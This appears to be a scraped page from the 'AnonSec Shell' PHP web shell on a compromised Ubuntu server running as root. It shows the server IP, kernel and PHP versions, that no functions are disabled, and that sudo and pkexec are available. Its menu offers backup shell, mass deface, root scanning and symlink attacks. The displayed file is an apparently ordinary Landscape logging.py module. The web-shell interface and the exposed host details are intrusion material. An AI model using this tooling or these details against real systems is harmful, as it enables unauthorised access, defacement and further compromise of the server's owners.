AnonSec Shell
Server IP : 209.38.156.173  /  Your IP : 216.73.216.122   [ Reverse IP ]
Web Server : Apache/2.4.52 (Ubuntu)
System : Linux lakekumayuhotel 5.15.0-136-generic #147-Ubuntu SMP Sat Mar 15 15:53:30 UTC 2025 x86_64
User : root ( 0)
PHP Version : 8.1.2-1ubuntu2.22
Disable Function : NONE
Domains : 2 Domains
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /lib/python3/dist-packages/landscape/lib/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /lib/python3/dist-packages/landscape/lib/logging.py
from __future__ import absolute_import

import logging
import os
import os.path
import sys


FORMAT = '%(asctime)s %(levelname)-8s [%(threadName)-10s] %(message)s'


def add_cli_options(parser, level='info', logdir=None):
    """Add common logging-related CLI options to the given arg parser."""
    parser.add_option('-q', '--quiet', default=False, action='store_true',
                      help='Do not log to the standard output.')

    logdirhelp = 'The directory in which to write log files'
    if logdir:
        logdirhelp += ' (default: {!r}).'.format(logdir)
    parser.add_option('-l', '--log-dir', metavar='FILE', default=logdir,
                      help=logdirhelp)

    parser.add_option('--log-level', default=level,
                      help='One of debug, info, warning, error or critical.')


def init_app_logging(logdir, level='info', progname=None, quiet=False):
    """Given a log dir, set up logging for an application."""
    if progname is None:
        progname = os.path.basename(sys.argv[0])
    level = logging.getLevelName(level.upper())
    _init_logging(
            logging.getLogger(),
            level,
            logdir,
            progname,
            logging.Formatter(FORMAT),
            sys.stdout if not quiet else None,
            )
    return logging.getLogger()


def _init_logging(logger, level, logdir, logname, formatter, stdout=None):
    # Set the log level.
    logger.setLevel(level)

    # Set up the log file.
    if not os.path.exists(logdir):
        os.makedirs(logdir)
    filename = os.path.join(logdir, logname + '.log')

    # Set the handlers.
    handlers = [
        logging.FileHandler(filename),
        ]
    if stdout:
        handlers.append(logging.StreamHandler(stdout))
    for handler in handlers:
        logger.addHandler(handler)
        handler.setFormatter(formatter)


def rotate_logs():
    """
    This closes and reopens the underlying files in the logging module's
    root logger. If called after logrotate (or something similar) has
    moved the old log file out of the way, this will start writing to a new
    new log file...
    """
    for handler in logging.getLogger().handlers:
        if isinstance(handler, logging.FileHandler):
            handler.acquire()
            try:
                handler.stream.close()
                handler.stream = open(handler.baseFilename,
                                      handler.mode)
            finally:
                handler.release()
    logging.info("Landscape Logs rotated")

Anon7 - 2022
AnonSec Team